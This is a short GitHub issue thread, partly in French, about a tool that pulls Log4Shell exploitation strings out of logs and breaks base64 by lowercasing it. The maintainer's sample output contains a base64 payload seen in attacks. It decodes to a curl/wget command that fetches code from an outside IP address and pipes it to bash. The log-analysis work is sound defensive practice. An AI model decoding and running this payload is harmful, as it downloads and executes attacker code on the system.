### ISSUE TITLE
improvment log4juicy

### ISSUE THREAD

**Issue by Tuxinou** [Th4nat0s/Chall_Tools#4]
Hello,

The script is lowering all the strings... Problematic when you have base64.

Seb

**Comment by Th4nat0s** [comment]
A la dégeulasse mais ca fait le taff ( le b64 propre est arraché dans le field 4 ) .
S'attenends a un Base64 qqchose dans l'url

$ ./juicy_logs4j.py test_dom  | cut -d "|" -f4 | sort -u

['ase64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK']
